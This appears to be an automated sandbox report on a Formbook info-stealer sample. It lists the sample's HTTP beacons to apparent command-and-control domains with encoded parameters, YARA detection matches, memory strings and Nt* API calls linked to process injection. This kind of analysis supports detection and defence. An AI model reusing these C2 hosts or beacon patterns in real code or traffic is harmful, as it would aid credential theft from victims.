            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1Host: www.bodyfuelrtd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.100feetpics.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Jan 2021 19:48:51 GMTContent-Type: text/htmlContent-Length: 1417Connection: closeVary: Accept-EncodingLast-Modified: Wed, 05 Aug 2020 09:00:18 GMTETag: "589-5ac1d99d73c92"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33
            Source: explorer.exe, 00000003.00000000.249758668.000000000F5C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: YvGnm93rap.exe, 00000000.00000002.227198607.000000000136A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004181C0 NtCreateFile,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00418270 NtReadFile,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004182F0 NtClose,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004183A0 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004181BB NtCreateFile,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041826B NtReadFile,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041839A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F398F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F399A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F395D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F396E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F397A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F398A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F399D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A10 NtQuerySection,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F395F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39560 NtWriteFile,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F396D0 NtCreateKey,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A770 NtOpenThread,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39760 NtOpenProcess,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_00B38D5D
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_0133CAE4
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_0133EEB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00401030
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004012FB
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041CB86
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00408C5B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00408C60
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402D87
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402D90
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C59E
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B69A
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402FB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00468D5D
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC28EC
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC20A8
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0B090
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A830
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FCE824
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1002
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F14120
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFF900
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC22AE
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B236
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FAFA2B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FA23E3
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB03DA
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBDBD2
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2ABD8
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2EBB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1EB9A
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2138B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1AB40
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F9CB4F
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2B28
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBD466
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0841F
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0D5E0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC25DD
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22581
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D82
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC1D55
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF0D20
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2D07
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2EF7
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F16E30
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBD616
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC1FF1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FCDFCE
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: String function: 00EFB150 appears 139 times
            Source: YvGnm93rap.exe, 00000000.00000002.226831421.0000000000BD2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227198607.000000000136A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227438383.0000000003090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000003.226728460.0000000000CB6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000000.226123201.0000000000502000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000002.267167548.000000000125F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs YvGnm93rap.exe
            Source: YvGnm93rap.exeBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
            Source: YvGnm93rap.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
